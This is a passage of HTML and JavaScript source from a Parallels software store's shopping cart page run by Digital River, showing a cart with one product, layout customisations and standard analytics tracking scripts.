<option>BGN</option>
<option>BRL</option>
<option>CAD</option>
<option>CHF</option>
<option>CLP</option>
<option>CNY</option>
<option>CZK</option>
<option>DKK</option>
<option>EEK</option>
<option>EGP</option>
<option>EUR</option>
<option>GBP</option>
<option>HKD</option>
<option>HRK</option>
<option>IDR</option>
<option>ILS</option>
<option>INR</option>
<option>ISK</option>
<option>JPY</option>
<option>KRW</option>
<option>LTL</option>
<option>LVL</option>
<option>MXN</option>
<option>MYR</option>
<option>NOK</option>
<option>NZD</option>
<option>PLN</option>
<option>RUB</option>
<option>SAR</option>
<option>SEK</option>
<option>SGD</option>
<option>THB</option>
<option>TRY</option>
<option>TWD</option>
<option>UAH</option>
<option>ZAR</option>
</select>
<noscript>
<input type="submit" class="dr_button" value="update"/>
</noscript>
</p>
</form>
</div>
<form method="post" action="/store/">
<input name="Action" type="hidden" value="DisplayThreePgCheckoutShoppingCartPage"/>
<input name="SiteID" type="hidden" value="para"/>
<input name="Locale" type="hidden" value="en_US"/>
<input value="com.digitalriver.template.form.ShoppingCartForm" name="Form" type="hidden"/>
<input name="CallingPageID" type="hidden" value="ThreePgCheckoutShoppingCartPage"/>
<div id="dr_orderNumber">
<p>
<strong>Reference Number:</strong>..7154199726</p>
</div>
<div id="dr_shoppingCartTable">
<table id="dr_cartTbl" summary="This table contains your Shopping Cart information">
<thead>
<tr>
<th scope="col" class="dr_productName">Product Name</th>
<th class="dr_qty" scope="col">Qty</th>
<th class="dr_deliveryMethod" scope="col">Delivery</th>
<th class="dr_price">Price</th>
<th class="dr_remove" scope="col">remove</th>
</tr>
</thead>
<tbody>
<tr class="dr_oddRow">
<td scope="row" class="dr_productName">
<a target="_blank" href="/store/para/en_US/DisplayPage/id.ProductInterstitialDetailsPage/productID.222100500" onclick="popUp(this.href,'productDetail',450,400);return false;" lineItemID="5217904426">Parallels Small Business Panel for Windows - 1 User</a>
</td>
<td class="dr_qty">
<input type="hidden" name="ORIG_VALUE_lineItemID$$1001" value="5217904426"/>
<input name="lineItemID$$1001" value="5217904426" type="hidden"/>
<span class="dr_error">
<!--..-->
</span>
<input type="hidden" name="ORIG_VALUE_quantity$$1001" value="2"/>
<input name="quantity$$1001" value="2" size="2" class="dr_qtyInput" type="text"/>
<input type="image" class="dr_refreshQtyImage" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_update.gif" alt="update" title="update"/>
</td>
<td class="dr_deliveryMethod" scope="row"/>
<td scope="row" class="dr_price">$80.00</td>
<td class="dr_remove" scope="row">
<a class="dr_deleteItemLink" href="/store/para/en_US/RemoveItemFromRequisition/lineItemID.5217904426/nextAction.DisplayThreePgCheckoutShoppingCartPage" title="remove" rel="nofollow">
<img class="dr_deleteItemImage" border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/removex2new.gif" alt="remove"/>
</a>
</td>
</tr>
<tr>
<td colspan="5" class="dr_backUpCD">
<div class="bucket-noheader-container">
<div class="bucket-top">
<span/>
</div>
<div class="bucket-borders">
<div class="bucket-noheader-content">
<div class="candy">
<h2 class="hdr-alpha">
<span id="dr_candyRackHeader" class="dr_subHeader">
<em>
                                                           We also recommend:
                                                       </em>
</span>
</h2>
</div>
</div>
</div>
<div class="bucket-btm">
<span>..</span>
</div>
</div>
</td>
</tr>
<tr>
<td colspan="3" class="dr_couponCode">
<label for="promoCode">Promo Code:</label>
<input type="hidden" name="ORIG_VALUE_popName" value="PointOfSale_CouponEntryField"/>
<input name="popName" value="PointOfSale_CouponEntryField" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_couponCode" value=""/>
<input name="couponCode" value="" type="text" size="10" id="promoCode"/>
<input type="image" class="dr_button" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_apply.gif"/>
</td>
<td colspan="2" class="dr_updateBtn"/>
</tr>
<tr id="dr_cartTotals">
<td colspan="3"/>
<td id="dr_totals" colspan="2">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr id="dr_priceTotal">
<td class="dr_price dr_totals">Total: $80.00</td>
</tr>
</table>
</td>
</tr>
</tbody>
</table>
</div>
<input type="image" class="dr_refreshQtyImage" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_update.gif" alt="update" title="update"/>
<div id="dr_siteButtons">
<div id="dr_continueShoppingButton">
<a class="dr_button" href="/store/para/en_US/ContinueShopping">
<img border="0" alt="continue shopping" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_continueShopping.gif"/>
</a>
</div>
<div id="dr_checkoutButton">
<a class="dr_button" href="https://store.parallels.com/store/para/en_US/DisplayThreePgCheckoutAddressPaymentInfoPage">
<img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_checkout.gif" alt="checkout"/>
</a>
</div>
</div>
<div id="creditCardLogos">
<img alt="Accept Credit Cards" src="/DRHM/Storefront/Site/para/cm/images/payment-methods2.gif"/>
</div>
<p id="dr_cartPricingDisclaimer" class="dr_clearBoth">Prices and offers in the cart are subject to change until the order is submitted.</p>
<div id="dr_TCFooter"><div id="dr_overlay_wrapper" style="position:absolute;width:687px;height:383px;display:none;"><table border="0" cellspacing="0" cellpadding="0" id="dr_overlay_table"><tr><td class="dr_overlay_table_top_left">&nbsp;</td><td class="dr_overlay_table_top_middle">&nbsp;</td><td class="dr_overlay_table_top_right">&nbsp;</td></tr><tr><td class="dr_overlay_table_left">&nbsp;</td><td class="dr_overlay_table_middle"><div id="dr_overlay_header"><div id="dr_overlay_close_window"><a href="#" title="Close Window"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/close_en_US.gif" align="right" alt="Close Window" border="0"/></a></div><div id="dr_overlay_logo"><a href="/store/defaults/en_US&id=DRAboutDigitalRiverPage" target="DrOverlayIframe"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif" width="115" height="27" alt="Digital River" border="0"></a></div><div class="dr_overlay_clearit"><!-- --></div><div id="dr_overlay_nav"><ul id="dr_overlay_tabs"><li class="dr_overlay_about_digital_river"><a id="ContactInformationLink" href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage" target="DrOverlayIframe">About Digital River, Inc.</a></li><li class="dr_overlay_privacy_policy"><a id="PrivacyPolicyLink" href="/store/defaults/en_US/DisplayDRPrivacyPolicyPage" target="DrOverlayIframe">Privacy Policy</a></li><li class="dr_overlay_terms_and_conditions"><a id="TermsAndConditionsLink" href="/store/defaults/en_US/DisplayDRTermsAndConditionsPage" target="DrOverlayIframe">Terms of Sale</a></li><li class="dr_overlay_print"><a href="#"><img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/icon_printer.gif" alt="Print"/></a></li></ul><!-- /#dr_overlay_tabs --></div><div class="dr_overlay_clearit"><!-- --></div></div><!-- /#dr_overlay_header --><iframe name="DrOverlayIframe" src="javascript:false" width="665" height="300" scrolling="auto" frameborder="0" marginheight="0" marginwidth="0"></iframe></td><td class="dr_overlay_table_right">&nbsp;</td></tr><tr><td class="dr_overlay_table_bottom_left">&nbsp;</td><td class="dr_overlay_table_bottom_middle">&nbsp;</td><td class="dr_overlay_table_bottom_right">&nbsp;</td></tr></table></div><!-- /#dr_overlay_wrapper --><script type="text/javascript">if (!window.jQuery) {document.writeln('<scr'+'ipt type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.3.2.min.js"></scr'+'ipt>');}</script><script type="text/javascript">(function($){$(window).load(function(){if ($.boxModel || ($.support && $.support.boxModel)) {$('head').append('<link rel="stylesheet" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.base.css" type="text/css"/>');var msie = navigator.userAgent.match(/MSIE (\d+)/);var ie6 = false;var dataOK = true;if (msie) {var ver = parseInt(msie[1]);if (ver < 8) {dataOK = false;if (ver < 7) {ie6 = true;$('head').append('<link rel="stylesheet" href="//drh1.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.IE6.css" type="text/css"/>');}else {$('head').append('<link rel="stylesheet" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.IE7.css" type="text/css"/>');}}}else if (/Firefox\/3\.5/.test(navigator.userAgent)) {dataOK = false;}if (dataOK) {$('head').append('<link rel="stylesheet" href="//drh1.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.data.css" type="text/css"/>');}var overlaySetup = function(){var footerLinkSelector = 'a.dr_aboutDigitalRiver,a.dr_privacyPolicy,a.dr_termsAndConditions';$(footerLinkSelector).removeAttr('onclick');$('#dr_overlay_wrapper').overlay({fixed: !ie6,modal: {css: {backgroundColor: '#FFF'}},showSelector: footerLinkSelector,hideSelector: '#dr_overlay_close_window > a[href="#"]',onShow: function(bgOverlay, footerLink){var iframeOverlay = this;$(bgOverlay).fadeIn('normal', function(){if (ie6) {self.scrollTo(0, 0);}$(iframeOverlay).slideDown('slow');});$('iframe', this).one('load', function(){$(this).css('visibility', 'visible');});parent.frames[footerLink.target].location.replace(footerLink.href);return false;},onHide: function(bgOverlay){$(this).hide();$(bgOverlay).fadeOut('normal');return false;}}).find('li.dr_overlay_print > a[href="#"]').click(function(){if (window['DrOverlayIframe']) {window['DrOverlayIframe'].focus();window['DrOverlayIframe'].print();}}).end().find('#dr_overlay_logo > a,li.dr_overlay_about_digital_river > a,li.dr_overlay_privacy_policy > a,li.dr_overlay_terms_and_conditions > a').click(function(){parent.frames[this.target].location.replace(this.href);return false;});};if ($.fn.overlay) {overlaySetup();}else {$.ajax({url: '//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.overlay-1.1.min.js',dataType: 'script',cache: true,global: false,success: overlaySetup});}}});})(jQuery);</script><p><a class="dr_aboutDigitalRiver" href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'aboutDigitalRiver',400,400);return false;" target="DrOverlayIframe">Digital River Inc.</a> is the authorized reseller and merchant of the products and services offered within this store.</p><p><a class="dr_privacyPolicy" href="/store/defaults/en_US/DisplayDRPrivacyPolicyPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'privacyPolicy',660,400);return false;" target="DrOverlayIframe">Privacy Policy</a>&nbsp;&nbsp;&nbsp;<a class="dr_termsAndConditions" href="/store/defaults/en_US/DisplayDRTermsAndConditionsPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'termsAndConditions',630,400);return false;" target="DrOverlayIframe">Terms of Sale</a>&nbsp;&nbsp;&nbsp;</p></div>
</form>
</div>
</div>




<script type="text/javascript">
// Called via onchange from shipping dropdown
function changeEstimatedShipping(zoneList, optionList, shippingForm) {
if (zoneList.selectedIndex !== 0) {
shippingForm.shippingOptionID.value = optionList.options[optionList.selectedIndex].value;
shippingForm.country.value = zoneList.options[zoneList.selectedIndex].value;
q = false;
shippingForm.submit();
}
}
// fireclick
var fc_track = "shopping_cart";









/* Add */
var fc_prod_add = "[1]SP-SMBPanel Parallels Small Business Panel for Windows - 1 User?222100500?1?40.00";







</script>


</span><!-- /.opDefaultContent -->
<script type="text/javascript">
ptomodule.displayModule('para_ThreePgCheckoutShoppingCartPage_contentBody');
</script>
















<!-- popUp overlay tags -->
<div class="popup_window_wrapper" style="display:none;position:absolute;">
<div class="popup_window_title_bar_wrapper">
<div class="popup_shadow9"></div>
<div class="popup_title_bar">
<h1 class="popup_title_header"></h1>
<div class="popup_close_button_wrapper">
<div class="popup_button_cover"><a href="#" class="popup_close_button_link" title="Close Window"><img class="popup_close_button" src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/close_en_US.gif" alt="Close Window" border="0"/></a></div>
<div class="popup_title_fade"></div><div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_close_button_wrapper -->
</div><!-- /.popup_title_bar -->
<div class="popup_shadow1"></div>
<div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_window_title_bar_wrapper -->
<div class="popup_middle_wrapper">
<div class="popup_left_shadow_wrapper"><div class="popup_shadow8"></div><div class="popup_shadow7"></div></div><!-- /.popup_left_shadow_wrapper -->
<div class="popup_content_wrapper"><iframe class="popup_content_iframe" src="javascript:false;" scrolling="auto" frameborder="0">Loading...</iframe></div>
<div class="popup_right_shadow_wrapper"><div class="popup_shadow2"></div><div class="popup_shadow3"></div></div><!-- /.popup_right_shadow_wrapper -->
<div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_middle_wrapper -->
<div class="popup_bottom_bar_wrapper"><div class="popup_shadow6"></div><div class="popup_shadow5"></div><div class="popup_shadow4"></div><div class="popup_clear_it"><!-- --></div></div><!-- /.popup_bottom_bar_wrapper -->
</div><!-- /.popup_window_wrapper -->










<script type="text/javascript">
//if (pageNameFlag=='confirmOrderPage') {
//$('#dr_shipMethod').change(onShippingMethodChange);
//}

if (pageNameFlag=='quickBuyCartPage') {
$("#shippingDifferentThanBilling").click( function(){
$("#dr_shippingContainer").toggle();
});
}
</script>



<script type="text/javascript">
// Function to hide/show info
function hideText(id) {
jQuery('#'+id).toggle();
}
// Function to disable submit button after it has been clicked once already to prevent multiple order submission on CheckoutPayment and ConfirmOrder
function disableButton(button) {
//jQuery(button).hide();
}
// Pull in the overlay verison of popUp on DOM-ready, which will overwrite the old-school function above
if (top === self) { // Don't pull in this code if we're already in a pop-up (iframe)
jQuery(function(){


// Pull in the main CSS for the popUp overlay
       
jQuery.get('/store/para/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage', function(popUpStyle){
jQuery('head').append(popUpStyle);
}, 'html');

// Include browser-specific components
var dataOK = true;
var msie = navigator.userAgent.match(/MSIE (\d+)/);
if (msie) {
var ieVer = parseInt(msie[1]);
if (ieVer < 8) {
dataOK = false;
if ((ieVer < 7) && !jQuery.fn.overlay) { // Include the overlay plugin for IE6
jQuery.ajax({url: '//drh2.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.overlay.min.js', dataType: 'script', cache: true, global: false});
}
}
}
else if (/Firefox\/3\.5/.test(navigator.userAgent)) {
dataOK = false; // FF 3.5 bug #477118
}
// Pull in the draggable popUp overlay script
jQuery.ajax({url: '//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.draggable.popUp.min.js', dataType: 'script', cache: true, global: false});
// Use embedded data: images for the shadows, if the browser can handle it
if (dataOK) {
jQuery('head').append('<link rel="stylesheet" type="text/css" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/PopUp.Shadows.data.css"/>');
}
});
}
</script>



































<script type="text/javascript">
// Show the links that will allow the details to be expanded
jQuery(function(){
jQuery('#shippingDifferentThanBillingIndicator,span.dr_expandDetails').show().find('[data-expand-section]').click(function(){
jQuery('#'+jQuery(this).attr('data-expand-section')).toggle();
return !(this.href);
}).click();
});
$('#dr_ExtendedDownloadServiceOffer .dr_button, #dr_BackUpCDOffer .dr_button').click( function() {
$(this).css('visibility','hidden');
});
</script>








<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section2.html"-->
</div></td>
</tr>
<tr>
<td id="copyright"><div class="left">&copy; 1999-2011 Parallels, Inc. All rights reserved.</div><div class="right"></div></td>
</tr>
</table>
<script type="text/javascript">
   var errorMssgs = [];
   $('.dr_error').each(function(i) {
       errorMssgs[i] = $(this).html();
   });
   for (i=0;i<errorMssgs.length;i++) {
       if (errorMssgs[i].indexOf('Enter a valid value') > -1) {
        $('#dr_ThreePgCheckoutAddressPaymentInfo p.dr_requiredFieldsInfo').before('<p id="topError" style="color:red; font-size:12px; font-weight:bold;">Sorry, we have encountered an error. Please check that you have filled in everything correctly below.</p>');
           break;
       }
   }
</script>

<script type="text/javascript">
fc_track = (typeof(fc_track) === 'undefined') ? null : fc_track;
$(function () {
   function op_ChangeBreadcrumbs(argCurrentStep) {
if (argCurrentStep === 'billing') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_on.jpg");
} else if (argCurrentStep === 'review') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg");
$("#stepThree").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_on.jpg");
} else if (argCurrentStep === 'thank_you') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg");
$("#stepThree").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_off.jpg");
$("#stepFour").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step4_complete_on.jpg");
}
   }
op_ChangeBreadcrumbs(fc_track);
});
</script>

<script>
// Added by J D April 2010 to customize site
//Updated by J J 5/27/2010 - 8/2010
// Floating security Cert to the right
$('div#dr_geoTrustIcon').css('float','right');
$('div#dr_geoTrustIcon a').css('float','right').css('text-align','right'); //for IE
$('div#dr_geoTrustIcon a img').css('float','right').css('text-align','right'); //for IE

// Re-labelling and repositioning the Upsell Interstitial "Continue" (with purchase) link and
// Re-labelling and repositioning the Upsell Interstitial "Upgrade" button
$('#dr_productUpSell form div#dr_siteButtons').replaceWith('<div id="acceptOfferInput"><input class="dr_acceptOffer" type="submit" value="Upgrade your purchase"/></div><div id="origPurchCont"><a href="/store/para/en_US/DisplayShoppingCartPage">Continue with original purchase</a></div>');

//Remove text from Upsell
$('#dr_productUpSell h1').hide('');
//$('#dr_productUpSell #dr_offer ul li div.dr_product img').hide('');
//$('#dr_productUpSell h2').hide('');
$('#dr_productUpSell #dr_offer ul li div.dr_price').hide('');

// Changing the Continue Shopping Button Text
$('#dr_continueShoppingButton a.dr_button').css('background-color','#ffffff').css('font-size','10px').css('color','#0857A6').css('text-decoration','underline').css('float','left');
$('#dr_continueShoppingButton a.dr_button').html('&#60;&#60; Continue Shopping');

// Floating Credit Cards to the right
$('#creditCardLogos').css('float','right');

// Making Cart Total Bigger
$('td#dr_totals table tr#dr_priceTotal td.dr_price').css('font-size','12px').css('font-family','verdana');

// Removing text breadcrumbs
$('#dr_CheckoutBreadcrumb').hide('');

// Removing link from Product Name
$('#dr_ThreePgCheckoutShoppingCart td.dr_productName a[href!="/store/para/en_US/DisplayPage/id.ExtendedDownloadServiceMerchInfoPage"]').each(function(index) {
$(this).wrap("<span class='dr_productInfo'>"+$(this).html()+"</span>").remove();
});
// Adding rounded borders to Account Login Header
$('#dr_loginContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Account Login Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Billing Info Header
$('#dr_billingContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Billing Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Additional Info Header
$('#dr_optInContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Additional Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Payment Info Header
$('#dr_paymentContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Payment Information</td><td class="rightRound"></td></tr></table>');

// Styling Gray Headers
$('.loginTable').css('background-color','#a0a0a4').css('height','26px');
$('td.leftRound').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/leftroundcorner_v2.gif)').css('background-repeat','no-repeat').css('background-position','left').css('height','26px').css('font-family','verdana').css('font-size','13px').css('font-weight','bold').css('color','#fff').css('background-color','#a0a0a4');
$('td.rightRound').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/rightroundcorner_v2.gif)').css('background-repeat','no-repeat').css('background-position','right').css('height','26px').css('width','10px');

// Changing add buttons on Thank You Page
$('#dr_thankYouElementContainer .addOnOffer').css('height','25px');

// Remove refresh button on Quantity
$('#dr_shoppingCartTable input.dr_refreshQtyImage').remove('');

// Styling sub-Cart refresh button
$('input.dr_refreshQtyImage').css('float','right').css('margin','10px 0px 10px 0px');

// Remove remove header
$('th.dr_remove').html('');

// Float the Currency Selector to the right, move it up higher
$('#dr_currencySelector').css('right','10px').css('position','absolute').css('top','10px');

// Float the Checkout Button to the right, move it up higher
$('#dr_checkoutButton').css('right','0px').css('position','absolute').css('top','48px');

// Style the "Estimated Shipping" header
$('div#dr_shippingEst h3.shippingEst').css('background-color','#e6e6e6').css('padding','3px 0px 3px 10px');

// Centering Disclaimer and Changing Font
$('p#dr_cartPricingDisclaimer').css('font-size','11px').css('color','#565656').css('font-family','verdana').css('text-align','center');
$('div#dr_TCFooter').css('font-size','11px').css('color','#565656').css('font-family','verdana').css('text-align','center');

// Adding horizontal rule above the disclaimer
$('<div id="horizontalRule"><hr width="60%" color="#e5e5e5"></div>').insertBefore('p#dr_cartPricingDisclaimer');
$('#horizontalRule').css('width','100%').css('text-align','center').css('margin-top','80px').css('margin-bottom','5px');

// Login Button on Billing Page
$('input#dr_cc_login').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/continueButton.jpg)').css('background-repeat','no-repeat').css('width','77px').css('height','25px');

// Check box to opt-IN for en_US locale
$('#dr_optInEmail div.dr_formLine').replaceWith('<div class="dr_formLine"><label for="optIn" class="dr_label">We would like to keep you informed via email about product updates, upgrades, special offers and pricing. If you do not wish to be contacted via email, please ensure that the box is not checked.</label><input type="hidden" value="on" name="ORIG_VALUE_optIn"/><input type="checkbox" checked="checked" value="on" name="optIn"/></div>');

// Continue Button on Billing Page
$('input#checkoutButton').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','88px').css('height','23px');

// Top Submit Button on Verify Order Page
$('input#submitTop').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','115px').css('height','23px');

// Bottom Submit Button on Verify Order Page
$('input#submitBottom').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','115px').css('height','23px');

// Change Delivery Method to Delivery
$('table#dr_confirmTbl th.dr_deliveryMethod').html('Delivery');

// Remove border from dr_Content Table on Verify Order Page
$('table.dr_confirmTable').css('border','0px');

// Adding border to the Table
$('#dr_cartTbl > tbody > tr > td:first-child').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/lightGreyPixel.gif)').css('background-repeat','repeat-y');
$('#dr_cartTbl > tbody > tr > td:last-child').css('border-right','1px solid #e5e5e5');
// $('#dr_cartTbl > tbody > tr:last-child > td').css('border-bottom','1px solid #e5e5e5');
$('<tr><td colspan="5" style="padding:0; margin:0"><table width="100%" border="0" class="bottomCurveTable"><tr><td class="leftRoundBottom" width="12" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/leftRoundBottom_v2.gif);background-repeat:no-repeat;background-position:0 0;height:9px;width:12px"></td><td class="middleLineBottom" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/middleLineBottom.gif);background-repeat:repeat-x"></td><td class="rightRoundBottom" width="12" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/rightRoundBottom_v2.gif);background-repeat:no-repeat;background-position:top right;height:9px;width:12px"></td></tr></table></td></tr>').appendTo('table#dr_cartTbl');

// Reposition the "Order Number" field on the Invoice page
$('<br /><br />').insertBefore('#dr_Invoice span#dr_orderNumber'); // drop below the order date
$('<br />').insertBefore('#dr_Invoice div#dr_billingAddress');// add space between Ord num and bill addr

// Remove the parallels.com cs email link and form
$("#dr_TechnicalAssistance p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_technicalSupportSection p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_DownloadInformation p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_technicalSupportSection p:contains('OR')").remove();
$("#dr_contactFormSection").remove();

// Replace Payment Method dd on Order Info page
$('#dr_OrderInformation dl div.dr_q2 dd').replaceWith('<dd>We accept Visa&#174;, MasterCard&#174;, EuroCard, Discover&#174;, American Express&#174;, and Diner\'s Club&#174;, as well as PayPal, check cards and ATM cards if they are issued by one of these major credit card companies. We also accept checks, money orders, and wire transfers. If you choose to pay by check, money order, or wire transfer, you will receive instructions on how to send your payment once you submit your order.<p>Our servers encrypt all information submitted to them, so you can be confident that your credit card information will be kept safe and secure.</p></dd>');
// Remove "How do I start a new order?" from "Need Help?" page
$('#dr_Help #dr_helpColumnLeft #dr_orderInformationFAQ ul li.dr_q12').remove();
// Remove "How do I start a new order?" from Order Info page
$('#dr_OrderInformation dl div.dr_q12').remove();
// Replace "Can I order without a credit card?" dd on Order Info page
$('#dr_OrderInformation dl div.dr_q7 dd').replaceWith('<dd>Yes. In addition to credit cards we accept checks, PayPal, money orders and wire transfers. If you choose to pay by check, money order, or wire transfer, you will receive instructions on how to send your payment once you submit your order. </dd>');

// Change Refund Request URL on "Returns and Cancellations" page
$('#dr_ReturnAndCancellations dl div.dr_q3 dd').replaceWith('<dd>To request a refund, go to <a href="http://www.parallels.com/support" target="_blank">www.parallels.com/support</a>.</dd>');

//Updated Backup CD addon button on shopping cart page

$("#dr_ThreePgCheckoutShoppingCart div.addonDetailsButton a img, div.dr_candyRackChildProduct img.dr_buttonCandyRack").attr("src", "/DRHM/Storefront/Site/para/cm/images/Add_4.gif");

$('#dr_ProductDetails #dr_socialNetworkLinks').hide();

$('div.dr_candyRackChildProduct').insertAfter('h2.hdr-alpha');

</script>

<!--!/esi:include -->











<span class="opDefault" id="opmodule_para_bodyBottom"></span>
<script type="text/javascript">
ptomodule.displayModule('para_bodyBottom');
</script>









<script type="text/javascript">
var s_account = 'swsdev';
var omnChannel,omnProp2,omnProp4,omnEvents,omnProducts,omnState,omnZip,omnPurchaseID;
var omnPageName='ThreePgCheckoutShoppingCartPage';

</script>



<script type="text/javascript">
function omnitureProducts(prodString) { // convert FC string to Omniture string
rExp = /,/g;
rExp2 = /\?/g;
prodStringDelimiter = prodString.replace(rExp, ',;');
prodStringSeparator = prodStringDelimiter.replace(rExp2, ';');
s_products = ';'+prodStringSeparator;
return s_products;
}
omnPageName='Checkout: Shopping Cart';
omnChannel='Checkout';
omnProp2='Checkout: Shopping Cart';
omnProp4='Checkout';
omnEvents='scView';
if (typeof fc_prod_remove != 'undefined'){
omnProducts=omnitureProducts(fc_prod_remove);
omnEvents='scRemove';
}
if (typeof fc_prod_add != 'undefined'){
omnProducts=omnitureProducts(fc_prod_add);
omnEvents='scAdd';
}
if (typeof fc_prod_open != 'undefined'){
omnProducts=omnitureProducts(fc_prod_add);
omnEvents='scOpen,scAdd';
}
if (typeof fc_prod_view != 'undefined'){
omnEvents='scView';
}
</script>











   







<script type="text/javascript">

















































</script>
















   
   



   


       <script type="text/javascript">(function(){var cfsTrack = function(){setTimeout(function(){var img = new Image(1,1);img.src = '//7154199726---0---globalCommerce---0---173-193-214-243.cfspx.digitalriver.com/images/cleardot.gif';}, 100);};if (window.attachEvent) {window.attachEvent('onload', cfsTrack);} else {window.addEventListener('load', cfsTrack, false);}})();</script><noscript><img src="//7154199726---0---globalCommerce---0---173-193-214-243.cfspx.digitalriver.com/images/cleardot.gif" height=1 width=1 alt="" border="0" /></noscript>








<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/Omniture/s_code_20102010.js"></script>
<script type="text/javascript">









</script>
<script type="text/javascript">
       s.pageName=omnPageName
       if (omnChannel) s.channel= omnChannel
       s.currencyCode='USD'
       s.charSet='UTF-8'
       if (omnProp4) s.pageType= omnProp4 // Page Type
       /* Traffice Variables */
       if (omnProp2) s.prop2= omnProp2 //Category
       if (omnProp4) s.prop4= omnProp4 // Page Type
       /* Conversion Variables */
       if (omnState) s.state= omnState
       if (omnZip) s.zip= omnZip
       if (omnEvents) s.events = omnEvents
       if (omnProducts) s.products= omnProducts
       if (omnPurchaseID) s.purchaseID = omnPurchaseID
       /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
       var s_code=s.t();if(s_code)document.write(s_code)
</script>













<!-- ################################ -->
<!-- ### BEGIN Google Custom, TOP ### -->
<script type="text/javascript">
   var _gaq = _gaq || [];

   _gaq.push(['_setAccount', 'UA-363966-1']);
   _gaq.push(['_setDomainName', '.parallels.com']);
   _gaq.push(['_setAllowHash', false]);
   _gaq.push(['_trackPageview']);

   (function() {
       var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
       ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';

       var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
   })();
</script>
<!-- ### END Google Custom, TOP ### -->
<!-- ################################ -->



<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1067174464;
var google_conversion_language = "en_US";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "g5WWCMyrvQEQwJTv_AM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
